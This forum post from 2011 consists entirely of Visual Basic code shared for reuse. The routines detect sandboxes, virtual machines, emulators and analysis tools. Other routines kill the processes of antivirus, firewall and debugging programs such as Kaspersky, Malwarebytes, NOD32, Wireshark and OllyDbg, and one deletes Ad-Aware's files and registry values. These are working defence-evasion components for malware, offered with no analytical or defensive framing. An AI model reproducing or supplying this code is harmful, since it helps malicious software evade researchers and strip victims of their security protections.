nSnoopy Posted April 13, 2011 Report Share Posted April 13, 2011 Imports Microsoft.Win32Module Antis Dim Devices As Object, Grafikadapter As String, RegionA As String = "SELECT * FROM Win32_VideoController" Dim regPID As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows NT\CurrentVersion", False) Dim pid As Object = regPID.GetValue("ProductId") Dim id As String = "76487-337-8429955-22614" Public Function antiKAV() As Boolean On Error GoTo error1 If Process.GetProcessesByName("avp").Length >= 1 Then Return True Else Return False End If Exit Functionerror1: End End FunctionPrivate Sub AntiWireShark() Dim ProcessList As System.Diagnostics.Process() ProcessList = System.Diagnostics.Process.GetProcesses() Dim Proc As System.Diagnostics.Process Dim title As String For Each Proc In ProcessList title = Proc.MainWindowTitle If (String.Equals(title, "The Wireshark Network Analyzer")) Then Proc.Kill() End If Next End Sub Public Function antiSandboxie() As Boolean On Error GoTo error1 If Process.GetProcessesByName("SbieSvc").Length >= 1 Then Return True Else Return False End If Exit Functionerror1: End End Function Public Function antiAnubis() As Boolean On Error GoTo error1 Dim folder As String = Application.StartupPath Dim getFile As String = folder & "\sample.exe" If Application.ExecutablePath = getFile Then Return True Else Return False End If Exit Functionerror1: End End Function Public Function antiAnubis2() As Boolean On Error GoTo error1 If pid = id Then Return True Else Return False End If Exit Functionerror1: End End Function Public Function AntiVirtualBox() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case "VirtualBox Graphics Adapter" Return True Case Else Return False End Select Exit Functionerror1: End End Function Public Function AntiVmWare() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case "VMware SVGA II" Return True Case Else Return False End Select Exit Functionerror1: End End Function Public Function AntiVirtualPC() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case "VM Additions S3 Trio32/64" Return True Case Else Return False End Select Exit Functionerror1: End End Function Private Sub getDevices() On Error GoTo error1 Devices = GetObject("winmgmts:").ExecQuery(RegionA) For Each AdaptList In Devices Grafikadapter = AdaptList.Description Next Exit Suberror1: End End SubEnd Module'---------------General Dee's Proccess Killers------------- '-----------Example Usage: "Anti-Keyscrambler()"----- '---------------Permission: To Use With Credits---------- '---------------Coded: Visual Basic 2008------------------- 'Kills Keyscrambler, Wireshark, Anubis, Malwarebytes, Kaspersky, Ollydbg, Outpost, Norman,Bit Defender, Nod32, Zone Alarm '------------------------Keyscrambler---------------------------- Sub AntiKeyscrambler() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "keyscrambler" generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Wireshark---------------------------- Sub AntiWireshark() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "wireshark" generaldee(i).Kill() Case Else End Select Next End Sub '----------------------------Anubis-------------------------------- Sub AntiAnubis() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "anubis" generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Malwarebytes---------------------------- Sub AntiMalwarebytes() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "mbam" generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Kaspersky---------------------------- Sub AntiKaspersky() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "avp" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Ollydbg--------------------------------- Sub AntiOllydbg() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "ollydbg" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Outpost--------------------------------- Sub AntiOutpost() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "outpost" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Norman------------------------------ Sub AntiNorman() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "npfmsg" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Bit Defender------------------------------ Sub AntiBitDefender() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "bdagent" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------NOD32------------------------------ Sub AntiNOD32() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "egui" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Zone Alarm------------------------------ Sub AntiZoneAlarm() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "zlclient" generaldee(i).Kill() Case Else End Select Next End SubPublic Function AntiEmulator() As Boolean Dim timenow As Long Dim timeaftersleep As Long 'Assign long timenow to get 'the milliseconds passed before 'app being suspended. timenow = TickCount 'Suspends the current thread for 500 milliseconds. Sleep(500) 'TickCount: Gets the number of milliseconds 'that passed since the application started. 'So timenow + sleep(500). timeaftersleep = TickCount 'timenow + sleep(500) - initial time < 500. If timeaftersleep - timenow < 500 Then AntiEmulator = True Else AntiEmulator = False End If End Function'Coded By Rue Port By Rapid91Imports System.Runtime.InteropServices<DllImport("kernel32.dll", CharSet := CharSet.Auto, SetLastError := True)> _Public Shared Function DeleteFile(ByVal path As String) As BooleanEnd FunctionShared Sub AdAware()Dim AdAwarePaths As New List(Of String)()Dim ProgramFiles As String = Shell32.GetCSIDLPath(Shell32.CSIDL.CSIDL_PROGRAM_FILES)AdAwarePaths.Add(ProgramFiles & "\Lavasoft\")For Each path As String In AdAwarePaths'Coded by RueIf Directory.Exists(path) ThenDim dirInfo As New DirectoryInfo(path)Dim dirFiles() As FileInfo = dirInfo.GetFiles("*.*", SearchOption.AllDirectories)For Each file As FileInfo In dirFilesTryKernel32.DeleteFile(file.FullName)CatchContinue ForEnd TryNext fileEnd IfNext pathDim rmLMADKeys As RegistryKey = Registry.LocalMachine.OpenSubKey("Software\Lavasoft\Ad-Aware\", True)'Coded by RueDim LMValues() As String = rmLMADKeys.GetValueNames()For Each key As String In LMValuesTryrmLMADKeys.DeleteValue(key)CatchContinue ForEnd TryNext keyrmLMADKeys.Close()End Sub' Anti-Sandboxie Example' SoraOption ExplictPrivate Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As LongPublic Sub CompName()Dim Sandboxie as BooleanIf GetModuleHandle("SbieDll.dll") Then Sandboxie = TrueIf Sandboxie = True Then MsgBox "Sandboxie Detected" End IfEnd SubCredits to theirs coders Quote Link to comment Share on other sites More sharing options...
